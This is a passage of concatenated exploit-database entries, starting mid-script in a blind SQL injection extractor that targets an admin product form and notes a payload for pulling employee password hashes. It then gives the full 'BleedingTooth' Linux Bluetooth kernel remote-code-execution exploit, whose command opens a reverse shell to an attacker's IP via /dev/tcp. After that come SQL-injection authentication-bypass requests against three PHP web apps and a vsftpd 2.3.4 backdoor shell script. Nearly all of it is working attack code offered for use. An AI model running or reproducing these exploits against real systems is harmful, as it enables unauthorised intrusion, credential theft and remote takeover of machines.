"form[step6][attachment_product][name]": '', "form[step6][attachment_product][description]": '', "form[id_product]": "1", "form[_token]": "4KtBNSbjc--GLbsVr__-wqC5Qw2hQKDXh6zb8vWKBwA", "form[step1][active]": "1"} data["form[_token]"] = form_token data["form[step3][location]"] = sql_payload data["form[id_product]"] = product_id # print(sql_payload) r = s.post(url, headers=headers, data=data) if(productDetails_form_location(s,target,token,product_id,admin_path) == "1"): return j return None for i in range(1,41): payload = "0'|(ascii(substr(user(),%d,1)) regexp [CHAR])#" % i extracted_char = chr(sqli(s,token,form_token,payload,target,product_id,admin_path)) sys.stdout.write(extracted_char) sys.stdout.flush() print("\n(+) done!") #PAYLOAD TO EXTRACT PASSWORD: # payload: 0'|ascii((substr((select passwd from ps_employee),1,1)) regexp [CHAR]#)

# Exploit Title: Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution # Date: 06/04/2020 # Exploit Author: Google Security Research (Andy Nguyen) # Tested on: 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux # CVE : CVE-2020-12351, CVE-2020-12352 /* * BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution * by Andy Nguyen (theflow@) * * This Proof-Of-Concept demonstrates the exploitation of * CVE-2020-12351 and CVE-2020-12352. * * Compile using: * $ gcc -o exploit exploit.c -lbluetooth * * and execute as: * $ sudo ./exploit target_mac source_ip source_port * * In another terminal, run: * $ nc -lvp 1337 * exec bash -i 2>&0 1>&0 * * If successful, a calc can be spawned with: * export XAUTHORITY=/run/user/1000/gdm/Xauthority * export DISPLAY=:0 * gnome-calculator * * This Proof-Of-Concept has been tested against a Dell XPS 15 running * Ubuntu 20.04.1 LTS with: * - 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 * x86_64 x86_64 x86_64 GNU/Linux * * The success rate of the exploit is estimated at 80%. */ #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> #include <bluetooth/l2cap.h> #include <errno.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/uio.h> #include <unistd.h> #define REMOTE_COMMAND "/bin/bash -c /bin/bash</dev/tcp/%s/%s" // Increase if the heap spray is not reliable. #define NUM_SPRAY_KMALLOC_1024 6 #define NUM_SPRAY_KMALLOC_128 6 // Increase if stuck at sending packets. #define HCI_SEND_ACL_DATA_WAIT_USEC 5000 #define KERNEL_TEXT_BASE 0xffffffff81000000 #define KERNEL_UBUNTU_5_4_0_48 1 #ifdef KERNEL_UBUNTU_5_4_0_48 #define PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET 0xffffffff81567f46 #define POP_RAX_RET 0xffffffff8103d0b1 #define POP_RDI_RET 0xffffffff8108efa0 #define JMP_RAX 0xffffffff8100005b #define RUN_CMD 0xffffffff810ce470 #define DO_TASK_DEAD 0xffffffff810dc260 #define KASLR_DEFEAT(kaslr_offset, kernel_addr) \ do { \ if ((kernel_addr & 0xfffff) == 0xf4d8e) \ kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xf4d8e; \ else \ kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xc001a4; \ } while (0) #else #error "No kernel version defined" #endif #define L2CAP_IDENT 0x41 #define SIGNALLING_CID 0x01 #define AMP_MGR_CID 0x03 typedef struct { uint8_t code; uint8_t ident; uint16_t len; } __attribute__((packed)) a2mp_hdr; #define A2MP_HDR_SIZE 4 #define A2MP_COMMAND_REJ 0x01 typedef struct { uint16_t reason; } __attribute__((packed)) a2mp_command_rej; #define A2MP_INFO_REQ 0x06 typedef struct { uint8_t id; } __attribute__((packed)) a2mp_info_req; #define A2MP_INFO_RSP 0x07 typedef struct { uint8_t id; uint8_t status; uint32_t total_bw; uint32_t max_bw; uint32_t min_latency; uint16_t pal_caps; uint16_t assoc_size; } __attribute__((packed)) a2mp_info_rsp; #define A2MP_ASSOC_REQ 0x08 typedef struct { uint8_t id; } __attribute__((packed)) a2mp_assoc_req; #define A2MP_ASSOC_RSP 0x09 typedef struct { uint8_t id; uint8_t status; uint8_t assoc_data[0]; } __attribute__((packed)) a2mp_assoc_rsp; typedef struct { uint8_t mode; uint8_t txwin_size; uint8_t max_transmit; uint16_t retrans_timeout; uint16_t monitor_timeout; uint16_t max_pdu_size; } __attribute__((packed)) l2cap_conf_rfc; static char remote_command[64]; static int hci_sock = 0, l2_sock = 0; static uint16_t hci_handle = 0; static uint64_t kaslr_offset = 0, l2cap_chan_addr = 0; static uint16_t crc16_tab[] = { 0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241, 0xC601, 0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440, 0xCC01, 0x0CC0, 0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40, 0x0A00, 0xCAC1, 0xCB81, 0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841, 0xD801, 0x18C0, 0x1980, 0xD941, 0x1B00, 0xDBC1, 0xDA81, 0x1A40, 0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01, 0x1DC0, 0x1C80, 0xDC41, 0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0, 0x1680, 0xD641, 0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081, 0x1040, 0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240, 0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441, 0x3C00, 0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41, 0xFA01, 0x3AC0, 0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840, 0x2800, 0xE8C1, 0xE981, 0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41, 0xEE01, 0x2EC0, 0x2F80, 0xEF41, 0x2D00, 0xEDC1, 0xEC81, 0x2C40, 0xE401, 0x24C0, 0x2580, 0xE541, 0x2700, 0xE7C1, 0xE681, 0x2640, 0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0, 0x2080, 0xE041, 0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281, 0x6240, 0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441, 0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41, 0xAA01, 0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840, 0x7800, 0xB8C1, 0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41, 0xBE01, 0x7EC0, 0x7F80, 0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40, 0xB401, 0x74C0, 0x7580, 0xB541, 0x7700, 0xB7C1, 0xB681, 0x7640, 0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101, 0x71C0, 0x7080, 0xB041, 0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0, 0x5280, 0x9241, 0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481, 0x5440, 0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40, 0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841, 0x8801, 0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40, 0x4E00, 0x8EC1, 0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41, 0x4400, 0x84C1, 0x8581, 0x4540, 0x8701, 0x47C0, 0x4680, 0x8641, 0x8201, 0x42C0, 0x4380, 0x8341, 0x4100, 0x81C1, 0x8081, 0x4040, }; static uint16_t crc16(uint16_t crc, const void *buf, size_t size) { const uint8_t *p = buf; while (size--) crc = crc16_tab[(crc ^ (*p++)) & 0xff] ^ (crc >> 8); return crc; } static int connect_l2cap(bdaddr_t dst_addr, uint16_t *handle) { int l2_sock; if ((l2_sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) { perror("[-] socket"); exit(1); } struct sockaddr_l2 laddr = {0}; laddr.l2_family = AF_BLUETOOTH; memcpy(&laddr.l2_bdaddr, BDADDR_ANY, sizeof(bdaddr_t)); if (bind(l2_sock, (struct sockaddr *)&laddr, sizeof(laddr)) < 0) { perror("[-] bind"); exit(1); } struct sockaddr_l2 raddr = {0}; raddr.l2_family = AF_BLUETOOTH; raddr.l2_bdaddr = dst_addr; if (connect(l2_sock, (struct sockaddr *)&raddr, sizeof(raddr)) < 0 && errno != EALREADY) { perror("[-] connect"); exit(1); } struct l2cap_conninfo conninfo = {0}; socklen_t len = sizeof(conninfo); if (getsockopt(l2_sock, SOL_L2CAP, L2CAP_CONNINFO, &conninfo, &len) < 0) { perror("[-] getsockopt"); exit(1); } if (handle) *handle = conninfo.hci_handle; return l2_sock; } static int connect_hci(void) { struct hci_dev_info di = {0}; int hci_device_id = hci_get_route(NULL); int hci_sock = hci_open_dev(hci_device_id); if (hci_devinfo(hci_device_id, &di) < 0) { perror("[-] hci_devinfo"); exit(1); } struct hci_filter flt = {0}; hci_filter_clear(&flt); hci_filter_all_ptypes(&flt); hci_filter_all_events(&flt); if (setsockopt(hci_sock, SOL_HCI, HCI_FILTER, &flt, sizeof(flt)) < 0) { perror("[-] setsockopt(HCI_FILTER)"); exit(1); } return hci_sock; } static void wait_event_complete_packet(void) { while (1) { uint8_t buf[256] = {0}; if (read(hci_sock, buf, sizeof(buf)) < 0) { perror("[-] read"); exit(1); } if (buf[0] == HCI_EVENT_PKT) { hci_event_hdr *hdr = (hci_event_hdr *)&buf[1]; if (btohs(hdr->evt) == EVT_NUM_COMP_PKTS) break; } } } static void hci_send_acl_data(int hci_sock, uint16_t hci_handle, void *data, uint16_t data_length, uint16_t flags) { uint8_t type = HCI_ACLDATA_PKT; hci_acl_hdr hdr = {0}; hdr.handle = htobs(acl_handle_pack(hci_handle, flags)); hdr.dlen = data_length; struct iovec iv[3] = {0}; iv[0].iov_base = &type; iv[0].iov_len = sizeof(type); iv[1].iov_base = &hdr; iv[1].iov_len = HCI_ACL_HDR_SIZE; iv[2].iov_base = data; iv[2].iov_len = data_length; if (writev(hci_sock, iv, sizeof(iv) / sizeof(struct iovec)) < 0) { perror("[-] writev"); exit(1); } usleep(HCI_SEND_ACL_DATA_WAIT_USEC); wait_event_complete_packet(); } static void disconnect_a2mp(void) { printf("[*] Disconnecting A2MP channel...\n"); struct { l2cap_hdr hdr; l2cap_cmd_hdr cmd_hdr; l2cap_disconn_req disconn_req; } disconn_req = {0}; disconn_req.hdr.len = htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE); disconn_req.hdr.cid = htobs(SIGNALLING_CID); disconn_req.cmd_hdr.code = L2CAP_DISCONN_REQ; disconn_req.cmd_hdr.ident = L2CAP_IDENT; disconn_req.cmd_hdr.len = htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE); disconn_req.disconn_req.dcid = htobs(AMP_MGR_CID); disconn_req.disconn_req.scid = htobs(AMP_MGR_CID); hci_send_acl_data(hci_sock, hci_handle, &disconn_req, sizeof(disconn_req), 2); } static void connect_a2mp(void) { printf("[*] Connecting A2MP channel...\n"); struct { l2cap_hdr hdr; } a2mp_create = {0}; a2mp_create.hdr.len = htobs(sizeof(a2mp_create) - L2CAP_HDR_SIZE); a2mp_create.hdr.cid = htobs(AMP_MGR_CID); hci_send_acl_data(hci_sock, hci_handle, &a2mp_create, sizeof(a2mp_create), 2); // Configure to L2CAP_MODE_BASIC and max MTU. struct { l2cap_hdr hdr; l2cap_cmd_hdr cmd_hdr; l2cap_conf_rsp conf_rsp; l2cap_conf_opt conf_opt; l2cap_conf_rfc conf_rfc; l2cap_conf_opt conf_opt2; uint16_t conf_mtu; } conf_rsp = {0}; conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE); conf_rsp.hdr.cid = htobs(SIGNALLING_CID); conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP; conf_rsp.cmd_hdr.ident = L2CAP_IDENT; conf_rsp.cmd_hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE); conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID); conf_rsp.conf_rsp.flags = htobs(0); conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT); conf_rsp.conf_opt.type = L2CAP_CONF_RFC; conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc); conf_rsp.conf_rfc.mode = L2CAP_MODE_BASIC; conf_rsp.conf_opt2.type = L2CAP_CONF_MTU; conf_rsp.conf_opt2.len = sizeof(uint16_t); conf_rsp.conf_mtu = htobs(0xffff); hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2); } static void prepare_l2cap_chan_addr_leak(void) { printf("[*] Preparing to leak l2cap_chan address...\n"); struct { l2cap_hdr hdr; l2cap_cmd_hdr cmd_hdr; l2cap_conf_rsp conf_rsp; l2cap_conf_opt conf_opt; l2cap_conf_rfc conf_rfc; } conf_rsp = {0}; conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE); conf_rsp.hdr.cid = htobs(SIGNALLING_CID); conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP; conf_rsp.cmd_hdr.ident = L2CAP_IDENT; conf_rsp.cmd_hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE); conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID); conf_rsp.conf_rsp.flags = htobs(0); conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT); conf_rsp.conf_opt.type = L2CAP_CONF_RFC; conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc); conf_rsp.conf_rfc.mode = L2CAP_MODE_ERTM; hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2); } static uint64_t leak_kstack(void) { printf("[*] Leaking A2MP kernel stack memory...\n"); struct { l2cap_hdr hdr; a2mp_hdr amp_hdr; a2mp_info_req info_req; } info_req = {0}; info_req.hdr.len = htobs(sizeof(info_req) - L2CAP_HDR_SIZE); info_req.hdr.cid = htobs(AMP_MGR_CID); info_req.amp_hdr.code = A2MP_INFO_REQ; info_req.amp_hdr.ident = L2CAP_IDENT; info_req.amp_hdr.len = htobs(sizeof(info_req) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr)); // Use a dummy id to make hci_dev_get() fail. info_req.info_req.id = 0x42; hci_send_acl_data(hci_sock, hci_handle, &info_req, sizeof(info_req), 2); while (1) { uint8_t buf[256] = {0}; if (read(hci_sock, buf, sizeof(buf)) < 0) { perror("[-] read"); exit(1); } if (buf[0] == HCI_ACLDATA_PKT) { l2cap_hdr *l2_hdr = (l2cap_hdr *)&buf[5]; if (btohs(l2_hdr->cid) == AMP_MGR_CID) { a2mp_hdr *amp_hdr = (a2mp_hdr *)&buf[9]; if (amp_hdr->code == A2MP_INFO_RSP) return *(uint64_t *)&buf[21]; } } } return 0; } static void trigger_type_confusion(void) { struct { l2cap_hdr hdr; uint16_t ctrl; a2mp_hdr amp_hdr; a2mp_command_rej cmd_rej; uint16_t fcs; } cmd_rej = {0}; cmd_rej.hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE); cmd_rej.hdr.cid = htobs(AMP_MGR_CID); cmd_rej.ctrl = 0xffff; cmd_rej.amp_hdr.code = A2MP_COMMAND_REJ; cmd_rej.amp_hdr.ident = L2CAP_IDENT; cmd_rej.amp_hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr) - sizeof(uint32_t)); cmd_rej.cmd_rej.reason = 0; cmd_rej.fcs = crc16(0, &cmd_rej, sizeof(cmd_rej) - sizeof(uint16_t)); hci_send_acl_data(hci_sock, hci_handle, &cmd_rej, sizeof(cmd_rej), 2); } static void build_krop(uint64_t *rop, uint64_t cmd_addr) { *rop++ = kaslr_offset + POP_RAX_RET; *rop++ = kaslr_offset + RUN_CMD; *rop++ = kaslr_offset + POP_RDI_RET; *rop++ = cmd_addr; *rop++ = kaslr_offset + JMP_RAX; *rop++ = kaslr_offset + POP_RAX_RET; *rop++ = kaslr_offset + DO_TASK_DEAD; *rop++ = kaslr_offset + JMP_RAX; } static void build_payload(uint8_t data[0x400]) { // Fake sk_filter object starting at offset 0x300. *(uint64_t *)&data[0x318] = l2cap_chan_addr + 0x320; // prog // Fake bpf_prog object starting at offset 0x320. // RBX points to the amp_mgr object. *(uint64_t *)&data[0x350] = kaslr_offset + PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET; // bpf_func *(uint64_t *)&data[0x358] = 0xDEADBEEF; // rbp // Build kernel ROP chain that executes run_cmd() from kernel/reboot.c. // Note that when executing the ROP chain, the data below in memory will be // overwritten. Therefore, the argument should be located after the ROP chain. build_krop((uint64_t *)&data[0x360], l2cap_chan_addr + 0x3c0); strncpy(&data[0x3c0], remote_command, 0x40); } static void spray_kmalloc_1024(int num) { // Skip first two hci devices because they may be legit. for (int i = 2; i < num + 2; i++) { printf("\r[*] Sending packet with id #%d...", i); fflush(stdout); struct { l2cap_hdr hdr; a2mp_hdr amp_hdr; a2mp_info_rsp info_rsp; } info_rsp = {0}; info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE); info_rsp.hdr.cid = htobs(AMP_MGR_CID); info_rsp.amp_hdr.code = A2MP_INFO_RSP; info_rsp.amp_hdr.ident = L2CAP_IDENT; info_rsp.amp_hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr)); info_rsp.info_rsp.id = i; hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2); struct { l2cap_hdr hdr; a2mp_hdr amp_hdr; a2mp_assoc_rsp assoc_rsp; uint8_t data[0x400]; } assoc_rsp = {0}; assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE); assoc_rsp.hdr.cid = htobs(AMP_MGR_CID); assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP; assoc_rsp.amp_hdr.ident = L2CAP_IDENT; assoc_rsp.amp_hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr)); assoc_rsp.assoc_rsp.id = i; for (int j = 0; j < sizeof(assoc_rsp.data); j += 8) memset(&assoc_rsp.data[j], 'A' + j / 8, 8); build_payload(assoc_rsp.data); // Send fragmented l2cap packets (assume ACL MTU is at least 256 bytes). hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp, sizeof(assoc_rsp) - sizeof(assoc_rsp.data), 2); hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x000], 0x100, 1); hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x100], 0x100, 1); hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x200], 0x100, 1); hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x300], 0x100, 1); } printf("\n"); } static void spray_kmalloc_128(int num) { // Skip first two hci devices because they may be legit. for (int i = 2; i < num + 2; i++) { printf("\r[*] Sending packet with id #%d...", i); fflush(stdout); struct { l2cap_hdr hdr; a2mp_hdr amp_hdr; a2mp_info_rsp info_rsp; } info_rsp = {0}; info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE); info_rsp.hdr.cid = htobs(AMP_MGR_CID); info_rsp.amp_hdr.code = A2MP_INFO_RSP; info_rsp.amp_hdr.ident = L2CAP_IDENT; info_rsp.amp_hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr)); info_rsp.info_rsp.id = i; hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2); struct { l2cap_hdr hdr; a2mp_hdr amp_hdr; a2mp_assoc_rsp assoc_rsp; uint8_t data[0x80]; } assoc_rsp = {0}; assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE); assoc_rsp.hdr.cid = htobs(AMP_MGR_CID); assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP; assoc_rsp.amp_hdr.ident = L2CAP_IDENT; assoc_rsp.amp_hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr)); assoc_rsp.assoc_rsp.id = i; for (int j = 0; j < sizeof(assoc_rsp.data); j += 8) memset(&assoc_rsp.data[j], 'A' + j / 8, 8); // Fake sock object. *(uint64_t *)&assoc_rsp.data[0x10] = l2cap_chan_addr + 0x300; // sk_filter hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp, sizeof(assoc_rsp), 2); } printf("\n"); } int main(int argc, char *argv[]) { if (argc != 4) { printf("Usage: %s target_mac source_ip source_port\n", argv[0]); exit(1); } bdaddr_t dst_addr = {0}; str2ba(argv[1], &dst_addr); snprintf(remote_command, sizeof(remote_command), REMOTE_COMMAND, argv[2], argv[3]); printf("[+] Remote command: %s\n", remote_command); printf("[*] Opening hci device...\n"); hci_sock = connect_hci(); printf("[*] Connecting to victim...\n"); l2_sock = connect_l2cap(dst_addr, &hci_handle); printf("[+] HCI handle: %x\n", hci_handle); connect_a2mp(); uint64_t kernel_addr = leak_kstack(); printf("[+] Kernel address: %lx\n", kernel_addr); KASLR_DEFEAT(kaslr_offset, kernel_addr); printf("[+] KASLR offset: %lx\n", kaslr_offset); if ((kaslr_offset & 0xfffff) != 0) { printf("[-] Error KASLR offset is invalid.\n"); exit(1); } prepare_l2cap_chan_addr_leak(); l2cap_chan_addr = leak_kstack() - 0x110; printf("[+] l2cap_chan address: %lx\n", l2cap_chan_addr); if ((l2cap_chan_addr & 0xff) != 0) { printf("[-] Error l2cap_chan address is invalid.\n"); exit(1); } // Somehow, spraying a bit before makes the UaF more reliable. printf("[*] Spraying kmalloc-1024...\n"); spray_kmalloc_1024(0x40); // Disconnect to free the l2cap_chan object, then reconnect. disconnect_a2mp(); connect_a2mp(); // Attempt to reclaim the freed l2cap_chan object. printf("[*] Spraying kmalloc-1024...\n"); for (int i = 0; i < NUM_SPRAY_KMALLOC_1024; i++) { spray_kmalloc_1024(0x40); } // Attempt to control the out-of-bounds read. printf("[*] Spraying kmalloc-128...\n"); for (int i = 0; i < NUM_SPRAY_KMALLOC_128; i++) { spray_kmalloc_128(0x40); } printf("[*] Triggering remote code execution...\n"); disconnect_a2mp(); trigger_type_confusion(); close(l2_sock); hci_close_dev(hci_sock); return 0; }

# Exploit Title: Blitar Tourism 1.0 - Authentication Bypass SQLi # Date: 13 April 2021 # Exploit Author: sigeri94 # Vendor Homepage: https://sourcecodeaplikasi.info/source-code-aplikasi-biro-travel-berbasis-web/ # Software Link: https://codeload.github.com/satndy/Aplikasi-Biro-Travel/zip/master # Version: 1.0 POST /travel/Admin/ HTTP/1.1 Host: 192.168.186.132 Content-Length: 49 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.186.132 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.186.132/travel/Admin/ Accept-Encoding: gzip, deflate Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=0nr18qfifjk2f5o4kimk5ca312 Connection: close username=admin%27+%23&password=admin&Login=Log+in

# Exploit Title: Simple Student Information System 1.0 - SQL Injection (Authentication Bypass) # Date: 13 April 2021 # Exploit Author: Galuh Muhammad Iman Akbar (GaluhID) # Vendor Homepage: https://www.sourcecodester.com/php/11400/simple-student-information-system-ajax-live-search.html # Software Link: https://www.sourcecodester.com/download-code?nid=11400&title=Simple+Student+Information+System+using+PHP+with+Source+Code # Version: 1.0 # Tested on: windows 10 POC Step 1 - Go to url http://localhost/studentinfosystem/index.php Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in burpsuite Step 4 – Change the username to 'or''=' and password 'or''=' Step 5 – after entering the payload, you can enter the website POST /studentinfosystem/index.php HTTP/1.1 Host: 192.168.1.14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 46 Origin: http://192.168.1.14 Connection: close Referer: http://192.168.1.14/studentinfosystem/index.php Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe Upgrade-Insecure-Requests: 1 username='or''='&password='or''='&login=Log+In

# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution # Date: 9-04-2021 # Exploit Author: HerculesRD # Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html # Version: vsftpd 2.3.4 # Tested on: debian # CVE : CVE-2011-2523 #!/usr/bin/python3 from telnetlib import Telnet import argparse from signal import signal, SIGINT from sys import exit def handler(signal_received, frame): # Handle any cleanup here print(' [+]Exiting...') exit(0) signal(SIGINT, handler) parser=argparse.ArgumentParser() parser.add_argument("host", help="input the address of the vulnerable host", type=str) args = parser.parse_args() host = args.host portFTP = 21 #if necessary edit this line user="USER nergal:)" password="PASS pass" tn=Telnet(host, portFTP) tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line tn.write(user.encode('ascii') + b"\n") tn.read_until(b"password.") #if necessary, edit this line tn.write(password.encode('ascii') + b"\n") tn2=Telnet(host, 6200) print('Success, shell opened') print('Send `exit` to quit shell') tn2.interact()

# Exploit Title: Digital Crime Report Management System 1.0 - SQL Injection (Authentication Bypass) # Date: 13 April 2021 # Exploit Author: Galuh Muhammad Iman Akbar (GaluhID) # Vendor Homepage: https://iwantsourcecodes.com/digital-crime-report-management-system-in-php-with-source-code/ # Software Link: https://iwantfilemanager.com/?dl=b48d951cbdd50568b031aab3b619fed2 I Found SQL Injection in 4 Page Login (Police Login page, Incharge Login page, User Login & HQ Login) *Police Login page* POST /digital-cyber-crime-report/policelogin.php HTTP/1.1 Host: 192.168.1.14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 53 Origin: http://192.168.1.14 Connection: close Referer: http://192.168.1.14/digital-cyber-crime-report/policelogin.php Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe Upgrade-Insecure-Requests: 1 email='or''='&password='or''='&s= *Incharge Login* POST /digital-cyber-crime-report/inchargelogin.php HTTP/1.1 Host: 192.168.1.14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 53 Origin: http://192.168.1.14 Connection: close Referer: http://192.168.1.14/digital-cyber-crime-report/inchargelogin.php Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe Upgrade-Insecure-Requests: 1 email='or''='&password='or''='&s= *User Login* POST /digital-cyber-crime-report/userlogin.php HTTP/1.1 Host: 192.168.1.14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 61 Origin: http://192.168.1.14 Connection: close Referer: http://192.168.1.14/digital-cyber-crime-report/userlogin.php Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe Upgrade-Insecure-Requests: 1 email=imanakbar1000%40gmail.com&password='or''='&s= *HQ Login* POST /digital-cyber-crime-report/headlogin.php HTTP/1.1 Host: 192.168.1.14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 61 Origin: http://192.168.1.14 Connection: close Referer: http://192.168.1.14/digital-cyber-crime-report/headlogin.php Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe Upgrade-Insecure-Requests: 1 email=imanakbar1000%40gmail.com&password='or''='&s=

